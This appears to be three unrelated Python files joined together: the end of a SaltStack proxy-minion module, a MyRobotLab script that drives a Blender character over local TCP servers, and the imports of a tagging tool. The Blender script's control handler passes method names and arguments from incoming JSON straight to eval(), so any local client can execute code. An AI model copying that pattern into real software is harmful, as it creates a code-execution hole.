'expression "%s"', target_info['engine'], word
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
six.text_type(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(six.text_type(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match %s ? "%s" => "%s"', self.opts['id'], tgt, results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error(
'Invalid compound target: %s for results: %s', tgt, results)
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
Blender.py
|
# TODO
# way to dynamically add actuators & controllers
# http://www.blender.org/api/blender_python_api_2_60_6/bpy.ops.logic.html
import bge # blender game engine
import bpy # blender python interface
import math
import mathutils
import sys
from os.path import expanduser
import socket
import threading
import socketserver
import json
import traceback
import math
from math import *
import mathutils
# FIXES
# clean/complete shutdown
# out of bge mode and back in - should still work - removal of all globals
# already started .... on start
# BGE - restart does not work !!!
# when "run script" bge does not exist
# BGE - restarted - and sockets left running - everything reconnects fine BUT GRAPHICS DONT MOVE !!
# MRL is disconnected - BGE terminates then restarts - connections look normal but mouth does not move !
# WORKS
# when MRL is terminated and BGE is left running - can connect multiple times & threads appear to die as expected
# regular start/stop appears to work
home = expanduser("~")
print (home)
print (sys.version)
print (sys.path)
controlPort = 8989
serialPort = 9191
readyToAttach = None # must I remove this too ?
#-------- obj begin ---------------
# ['__class__', '__contains__', '__delattr__', '__delitem__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__','__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__','__reduce_ex__', '__repr__', '__setattr__', '__setitem__', '__sizeof__', '__str__', '__subclasshook__', 'actuators', 'addDebugProperty', 'alignAxisToVect', 'angularVelocity', 'applyForce', 'applyImpulse', 'applyMovement', 'applyRotation', 'applyTorque', 'attrDict', 'children', 'childrenRecursive', 'collisionCallbacks','color', 'controllers', 'debug', 'debugRecursive', 'disableRigidBody', 'enableRigidBody', 'endObject', 'get', 'getActionFrame', 'getAngularVelocity', 'getAxisVect', 'getDistanceTo', 'getLinearVelocity', 'getPhysicsId', 'getPropertyNames','getReactionForce', 'getVectTo', 'getVelocity', 'groupMembers', 'groupObject', 'invalid', 'isPlayingAction', 'life', 'linVelocityMax', 'linVelocityMin', 'linearVelocity', 'localAngularVelocity', 'localInertia', 'localLinearVelocity', 'localOrientation', 'localPosition', 'localScale', 'localTransform', 'mass', 'meshes','name', 'occlusion', 'orientation', 'parent', 'playAction', 'position', 'rayCast', 'rayCastTo', 'record_animation', 'reinstancePhysicsMesh', 'removeParent', 'replaceMesh', 'restoreDynamics', 'scaling', 'scene', 'sendMessage', 'sensors', 'setActionFrame', 'setAngularVelocity', 'setCollisionMargin', 'setLinearVelocity','setOcclusion', 'setParent', 'setVisible', 'state', 'stopAction', 'suspendDynamics', 'timeOffset', 'visible', 'worldAngularVelocity', 'worldLinearVelocity', 'worldOrientation', 'worldPosition', 'worldScale', 'worldTransform']-------- obj end ---------------
print("-------- scene begin ---------------")
scene = bge.logic.getCurrentScene()
# help(scene)
print(dir(scene))
print("-------- scene end ---------------")
"""
obj = scene.objects["i01.head.jaw"]
print("-------- obj begin ---------------")
print(dir(obj))
print("-------- obj end ---------------")
print("localOrientation", obj.localOrientation)
print("localPosition", obj.localPosition)
print("----- actuator begin ----")
print(dir(obj.actuators["i01.head.jaw"]))
print("----- actuator end ----")
actuator = obj.actuators["i01.head.jaw"]
print("dRot", actuator.dRot)
print("angV", actuator.angV)
obj.applyRotation([ 0.1, 0.0, 0.0], True)
print("localOrientation", obj.localOrientation)
# euler rotations
xyz = obj.localOrientation.to_euler()
xyz[0] = math.radians(10)
obj.localOrientation = xyz.to_matrix()
# create a rotation matrix
mat_rot = mathutils.Matrix.Rotation(math.radians(10.0), 4, 'X')
print("mat_rot", mat_rot)
# mat_rot = mathutils.Matrix.Rotation(math.radians(10.0), 3, 'X')
# extract components back out of the matrix
#loc, rot, sca = obj.localOrientation.decompose()
#print(loc, rot, sca)
#obj.applyRotation(mat_rot)
#obj.localTransform = mat_rot
#obj.localOrientation = mat_rot.to_3x3()
"""
# TODO - derive from json object - so we can control correct encoding
# http://stackoverflow.com/questions/3768895/python-how-to-make-a-class-json-serializable
class MyRobotLab:
"""the MyRobotLab class - mrl manages the control and serial servers which the middleware interfaces with"""
def __init__(self):
self.control = None
self.controlServer = None
self.serialServer = None
self.virtualDevices = {}
self.blenderObjects = {}
self.version = "0.9"
self.pos = 0.0
def toJson(self):
ret = "{'control': "
ret += "'initialized'" if (self.control != None) else "'None'"
ret += ", 'controlServer': "
ret += "'initialized'" if (self.controlServer != None) else "'None'"
ret += ", 'serialServer': "
ret += "'initialized'" if (self.serialServer != None) else "'None'"
ret += ", 'virtualDevices': ["
vdJson = []
print(self.virtualDevices)
for vd in self.virtualDevices:
print("virtual device [" + vd + "]")
#vdJson.append("'" + vd + "': " + self.virtualDevices[vd])
#vdJson.append("'" + vd + "': '" + vd + "'")
ret += ",".join(self.virtualDevices)
ret += "]"
ret += "}"
return ret
def toJson():
return bpy.mrl.toJson();
# this is to initialize the mrl data
# it needs persist longer than just game mode
if (not hasattr(bpy, "mrl")):
print("initializing MyRobotLab")
bpy.mrl = MyRobotLab()
else:
print("MyRobotLab already initialized")
class Message:
"""an MRL message definition in Python"""
def __init__(self):
self.msgID = 0
self.timeStamp = 0
self.name = ""
self.sender = ""
self.method = ""
self.sendingMethod = ""
self.data = []
self.historyList = []
#def __init__(self, j):
#self.__dict__ = json.loads(j)
class VirtualDevice:
"""a virtual device Servo, Arduino, Lidar, etc"""
def __init__(self, name, type):
self.name = name
self.type = type
self.serialHandler = None
self.service = None
def toJson(self):
ret = "{'name':'" + self.name + "', 'type':'" + self.type + "',"
ret += "'serialHandler': '"
ret += "'initialized'" if (self.serialHandler != None) else "'None'"
ret += "'service': '"
ret += "'initialized'" if (self.service != None) else "'None'"
ret += "}"
def getVersion():
print("version is ", bpy.mrl.version)
return bpy.mrl.version
# TODO remove?
def Cube():
global a
#print ("cube ", a)
scene = bge.logic.getCurrentScene() #Locate current device
cont = bge.logic.getCurrentController()
own = cont.owner
xyz = own.localOrientation.to_euler() #Extract the Rotation Data
xyz[0] = math.radians(a) #PreLoad your RX data
#xyz[0] x Rotation axis
#xyz[1] y Rotation axis
#xyz[2] z Rotation axis
own.localOrientation = xyz.to_matrix() #Apply your rotation data
def createJsonMsg(method, data):
msg = Message()
msg.name = "blender"
msg.method = method
msg.sendingMethod = method
msg.data.append(data)
retJson = json.dumps(msg.__dict__)
# FIXME - better terminator ?
retJson = retJson + "\n"
return retJson.encode()
def onError(msg):
print(msg)
request = bpy.mrl.control.request
request.sendall(createJsonMsg("onError", msg))
def stopServer():
print ("stopping controlServer")
controlServer = bpy.mrl.controlServer
if (controlServer != None):
controlServer.shutdown()
else:
print("controlServer already stopped")
bpy.mrl.controlServer = None
print ("stopping serialServer")
serialServer = bpy.mrl.serialServer
if (serialServer != None):
serialServer.shutdown()
else:
print("serialServer already stopped")
bpy.mrl.serialServer = None
#for controlHandler in controlHandlers
# print (controlHandler)
#controlHandlers[controlHandler].listening = False
def startServer():
global controlPort
controlServer = bpy.mrl.controlServer
if (controlServer == None):
##### control server begin ####
controlServer = ThreadedTCPServer(("localhost", controlPort), ControlHandler)
bpy.mrl.controlServer = controlServer
ip, port = controlServer.server_address
# Start a thread with the controlServer -- that thread will then start one
# more thread for each request
controlThread = threading.Thread(target=controlServer.serve_forever)
# Exit the controlServer thread when the main thread terminates
controlThread.daemon = True
controlThread.start()
print ("control server loop running in thread: ", controlThread.name, " port ", controlPort)
##### control server end ####
##### serial server begin ####
serialServer = ThreadedTCPServer(("localhost", serialPort), SerialHandler)
bpy.mrl.serialServer = serialServer
ip, port = serialServer.server_address
# Start a thread with the serialServer -- that thread will then start one
# more thread for each request
serialThread = threading.Thread(target=serialServer.serve_forever)
# Exit the serialServer thread when the main thread terminates
serialThread.daemon = True
serialThread.start()
print ("serial server loop running in thread: ", serialThread.name, " port ", serialPort)
##### serial server end ####
else:
print ("servers already started")
# attach a device - control message comes in and sets up
# name and type - next connection on the serial port will be
# the new device
# FIXME - catch throw on class not found
def attach(name, type):
global readyToAttach
# adding name an type to new virtual device
newDevice = VirtualDevice(name, type)
# constructing the correct type
newDevice.service = eval(type + "('" + name + "')")
bpy.mrl.virtualDevices[name] = newDevice
readyToAttach = name
print("onAttach " + str(name) + " " + str(type) + " SUCCESS - ready for serial connection")
# print("<--- sending control onAttach(" + str(name) + ")")
# control.request.sendall(createJsonMsg("onAttach", name))
return name
class ControlHandler(socketserver.BaseRequestHandler):
listening = False
def handle(self):
bpy.mrl.control = self
#data = self.request.recv(1024).decode()
myThread = threading.current_thread()
print("---> client connected to control socket thread {} port {}".format(myThread.name, controlPort))
buffer = ''
listening = True
# change socket into a file
f = self.request.makefile()
while listening:
try:
# Try to receive som data
# data = self.request.recv(1024).decode()
# TODO - refactor to loading Message object
# jsonCmd = self.request.recv(1024).decode().strip()
jsonCmd = f.readline()
print("incoming json cmd -<" + jsonCmd + ">-")
controlMsg = json.loads(jsonCmd)
print("---> control: controlMsg ", controlMsg)
method = controlMsg["method"]
#### command processing begin ####
command = method + "("
cnt = 0
# unload parameter array
data = controlMsg["data"]
if (len(data) > 0):
for param in data:
cnt += 1
if isinstance(param, int):
command = command + str(param)
else:
command = command + "'" + param + "'"
if (len(data) != cnt):
command = command + ","
command = command + ")"
print ("*** command " , command, " ***")
ret = eval(command)
retMsg = Message()
retMsg.name = "blender"
retMsg.method = "on" + method[0:1].capitalize() + method[1:]
retMsg.sendingMethod = controlMsg["method"]
retMsg.data.append(ret)
retJson = json.dumps(retMsg.__dict__)
print ("<--- control: ret" , retJson)
self.request.sendall(retJson.encode())
# TODO - better way to send full json message ? better way to parse it?
self.request.sendall("\n".encode())
#### command processing end ####
except Exception as e:
print ("control handler error: ", e)
print (traceback.format_exc())
#run_main_loop = False
listening = False
print("terminating control handler", myThread.name, controlPort)
class SerialHandler(socketserver.BaseRequestHandler):
listening = False
service = None
name = ""
def handle(self):
global readyToAttach
myThread = threading.current_thread()
if (readyToAttach in bpy.mrl.virtualDevices):
print("++++attaching " + str(readyToAttach) + " serial handler++++ thread {} port {}".format(myThread.name, serialPort))
bpy.mrl.virtualDevices[readyToAttach].serialHandler = self
service = bpy.mrl.virtualDevices[readyToAttach].service
self.name = readyToAttach
else:
print("could not attach serial device")
# ERROR - we need a name to attach
onError("XXXX incoming serial connection but readyToAttach [" + str(readyToAttach) + "] XXXX")
return
listening = True
while listening:
try:
data = self.request.recv(1024)
service.handle(data)
except Exception as e:
print ("serial handler error: ", e)
print (traceback.format_exc())
#run_main_loop = False
listening = False
print("terminating serial handler", myThread.name, serialPort)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class Arduino:
MRLCOMM_VERSION = 21
##### PYTHON GENERATED DEFINITION BEGIN ######
# {publishMRLCommError Integer}
PUBLISH_MRLCOMM_ERROR = 1
# {getVersion}
GET_VERSION = 2
# {publishVersion Integer}
PUBLISH_VERSION = 3
# {analogReadPollingStart Integer}
ANALOG_READ_POLLING_START = 4
# {analogReadPollingStop Integer}
ANALOG_READ_POLLING_STOP = 5
# {analogWrite Integer Integer}
ANALOG_WRITE = 6
# {digitalReadPollingStart Integer}
DIGITAL_READ_POLLING_START = 7
# {digitalReadPollingStop Integer}
DIGITAL_READ_POLLING_STOP = 8
# {digitalWrite Integer Integer}
DIGITAL_WRITE = 9
# {motorAttach String String Integer Integer Integer}
MOTOR_ATTACH = 10
# {motorDetach String}
MOTOR_DETACH = 11
# {motorMove String}
MOTOR_MOVE = 12
# {motorMoveTo String double}
MOTOR_MOVE_TO = 13
# {pinMode Integer Integer}
PIN_MODE = 14
# {publishCustomMsg Integer}
PUBLISH_CUSTOM_MSG = 15
# {publishLoadTimingEvent Long}
PUBLISH_LOAD_TIMING_EVENT = 16
# {publishPin Pin}
PUBLISH_PIN = 17
# {publishPulse Integer}
PUBLISH_PULSE = 18
# {publishServoEvent Integer}
PUBLISH_SERVO_EVENT = 19
# {publishSesorData SensorData}
PUBLISH_SESOR_DATA = 20
# {publishStepperEvent StepperEvent}
PUBLISH_STEPPER_EVENT = 21
# {publishTrigger Pin}
PUBLISH_TRIGGER = 22
# {pulseIn int int int int}
PULSE_IN = 23
# {sensorAttach String}
SENSOR_ATTACH = 24
# {sensorPollingStart String int}
SENSOR_POLLING_START = 25
# {sensorPollingStop String}
SENSOR_POLLING_STOP = 26
# {servoAttach String Integer}
SERVO_ATTACH = 27
# {servoDetach Servo}
SERVO_DETACH = 28
# {servoSweepStart String int int int}
SERVO_SWEEP_START = 29
# {servoSweepStop String}
SERVO_SWEEP_STOP = 30
# {servoWrite String Integer}
SERVO_WRITE = 31
# {servoWriteMicroseconds String Integer}
SERVO_WRITE_MICROSECONDS = 32
# {setDebounce int}
SET_DEBOUNCE = 33
# {setDigitalTriggerOnly Boolean}
SET_DIGITAL_TRIGGER_ONLY = 34
# {setLoadTimingEnabled boolean}
SET_LOAD_TIMING_ENABLED = 35
# {setPWMFrequency Integer Integer}
SET_PWMFREQUENCY = 36
# {setSampleRate int}
SET_SAMPLE_RATE = 37
# {setSerialRate int}
SET_SERIAL_RATE = 38
# {setServoEventsEnabled String boolean}
SET_SERVO_EVENTS_ENABLED = 39
# {setServoSpeed String Float}
SET_SERVO_SPEED = 40
# {setStepperSpeed Integer}
SET_STEPPER_SPEED = 41
# {setTrigger int int int}
SET_TRIGGER = 42
# {softReset}
SOFT_RESET = 43
# {stepperAttach String}
STEPPER_ATTACH = 44
# {stepperDetach String}
STEPPER_DETACH = 45
# {stepperMoveTo String int int}
STEPPER_MOVE_TO = 46
# {stepperReset String}
STEPPER_RESET = 47
# {stepperStop String}
STEPPER_STOP = 48
# {stopService}
STOP_SERVICE = 49
##### PYTHON GENERATED INTERFACE END #####
def __init__(self, name):
print("creating new Arduino ", name)
self.name = name
self.servos = {}
self.msgByteCount = 0
self.msgSize = 0
self.method = 0
self.params = []
def sendMRLCOMMMsg(self, method, value):
socket = bpy.mrl.virtualDevices[self.name].serialHandler.request
print("sending bytes")
print(bytes([170, method, 1, value]))
# MRLCOMM PROTOCOL
# MAGIC_NUMBER|NUM_BYTES|FUNCTION|DATA0|DATA1|....|DATA(N)
# NUM_BYTES - is the number of bytes after NUM_BYTES to the end
socket.sendall(bytes([170, 2, method, value]))
def handle(self, byteArray):
newByteCnt = len(byteArray)
# print (self.name + " recvd " + str(newByteCnt) + " bytes")
# print(byteArray)
# parse MRL Msg
for newByte in byteArray:
self.msgByteCount += 1
# print("byte ", newByte, " byteCount ", self.msgByteCount, " size ", self.msgSize)
# check magic
if (self.msgByteCount == 1):
if (newByte != 170):
print("ERROR message does not begin with MAGIC")
self.msgByteCount = 0
self.msgSize = 0
elif (self.msgByteCount == 2):
# print command - TODO error checking > 64
self.msgSize = newByte
# print("MRLCOMM msg size is " + str(self.msgSize))
elif (self.msgByteCount == 3):
# print("MRLCOMM method is " + str(newByte))
self.method = newByte
elif (self.msgByteCount > 3 and self.msgByteCount - 3 < self.msgSize):
# print("MRLCOMM datablock")
self.params.append(newByte)
elif (self.msgByteCount > 3 and self.msgByteCount - 3 > self.msgSize):
print("MRLCOMM ERROR STATE - resetting ")
self.msgSize = 0
self.msgByteCount = 0
self.params = []
# now we have a full valid message
if (self.msgByteCount - 2 == self.msgSize and self.msgSize != 0):
print("Arduino Msg Method # -> ", self.method)
# GET_VERSION
if (self.method == self.GET_VERSION):
print("GET_MRLCOMM_VERSION")
self.sendMRLCOMMMsg(self.PUBLISH_VERSION, self.MRLCOMM_VERSION)
elif (self.method == self.SERVO_ATTACH):
print("SERVO_ATTACH", self.params)
# create "new" servo if doesnt exist
# attach to this Arduino's set of servos
params = self.params
servoIndex = params[0]
servoPin = params[1]
servoName = ""
for x in range(3, params[2]+3):
servoName += chr(params[x])
print ("servo index", servoIndex, "pin", servoPin, "name", servoName)
self.servos[servoIndex] = servoName
bpy.mrl.blenderObjects[servoName] = 0 # rest position? 90 ?
elif (self.method == self.SERVO_WRITE):
print("SERVO_WRITE", self.params)
servoIndex = self.params[0]
pos = self.params[1]
servoName = self.servos[servoIndex]
if (bge.logic.getCurrentController() is not None):
ob = bge.logic.getCurrentController().owner
if (servoName in ob.channels):
ob.channels[servoName].joint_rotation = mathutils.Vector([radians(pos),0,0])
ob.update()
print("WROTE ", servoName, pos, radians(pos))
else:
print("ERROR can't find bone ", servoName)
else:
print("ERROR logic controller == None - game engine not running?")
elif (self.method == self.SERVO_DETACH):
print("SERVO_DETACH", self.params)
elif (self.method == self.SET_SERVO_SPEED):
print("SET_SERVO_SPEED", self.params)
elif (self.method == self.SERVO_WRITE_MICROSECONDS):
print("SERVO_WRITE_MICROSECONDS", self.params)
else:
print ("ERROR UNKNOWN METHOD ", self.method, self.params)
#print("MRLCOMM msg done ")
self.msgSize = 0
self.msgByteCount = 0
self.params = []
# do command
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(message)
response = sock.recv(1024).encode
print ("Received: {}".format(response))
finally:
sock.close()
def endcomm():
print("endcomm")
bge.logic.endGame()
startServer()
frame = 0
def frameTick():
global frame
frame = frame + 1
|
hypertag.py
|
import os
import re
from typing import Set
from shutil import rmtree, move
import sqlite3
import urllib
import json
from multiprocessing import Pool
from pathlib import Path
import fire # type: ignore
from tqdm import tqdm # type: ignore
import rpyc # type: ignore
from pywebcopy import WebPage, config # type: ignore
from persistor import Persistor
from graph import graph
from utils import remove_dir, remove_symlink, download_url
